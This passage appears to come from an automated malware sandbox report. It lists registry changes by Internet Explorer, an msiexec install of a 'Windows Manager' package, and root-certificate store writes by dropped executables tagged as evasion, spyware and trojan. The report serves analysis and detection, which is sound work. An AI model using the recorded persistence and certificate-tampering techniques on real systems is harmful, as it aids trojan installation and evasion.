Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca00000000020000000000106600000001000020000000ffe547281c27a7dc5b2435483b33e951367f33a80215c53638c784f40c169c14000000000e8000000002000020000000197ea500c78551d6641fc8a2778e71e9894c0ab12c39b818f310fb0ba33664c320000000f4a0580b4d2a7b385b61fb12f0200ff52028298bd809f8efc23531499ca3c7584000000037dc59acc6d36535e83943ce4ddf3c06123be1964a7b80e3229375fb8c55b0eca46c762d760600fcdf9f0c2e034af784e0188e1c7311ccb865dd757bd2febeff C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\ = "90" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "1309" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca000000000200000000001066000000010000200000006849a380fe815a5d3814a70376392fd1dc4bef12d43f87c2f6d73836e6517326000000000e80000000020000200000009c1044740f4c4c487af17b92b957141728c1af77b0f9894bc724f9bd60234da990000000960823838affef962b8e361519d2c0da6fe72a8f0d6da41fd807bf04f9e7448a9eb45f67d8872270a5a1effc46b33a6d7ccfc029c7ef9788de72a0e0b363d39aba6da198497d635fc38840eeed1ed0256b117753bcc5cc1bcece2d461a8dc591cb9521b41d50331cd0468b082fe1a1366048855e2a7fd6b0be0b10192f6215c77011c37fc986dbbd5244c8e0f0fae440400000001436a40369e98d41ae4ad177d940db595a52bb296b3946e505a30337d68e7abcc627616a5b0c0f606429a787f7b51ca5ec7ef43a85d3cf8f1f8872061b62019a C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "338157858" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\Total = "122" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\Total = "1309" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\Total = "9" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\ = "9" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8D3DD560-1340-11EC-9BEC-E6B9D810DB97} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\NumberOfSubdomains = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "28" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\Total = "28" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\theonlygames.com\ = "75" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\ProgramData\3769868.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\ProgramData\3769868.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e6a852f849bb2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\ProgramData\3769868.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8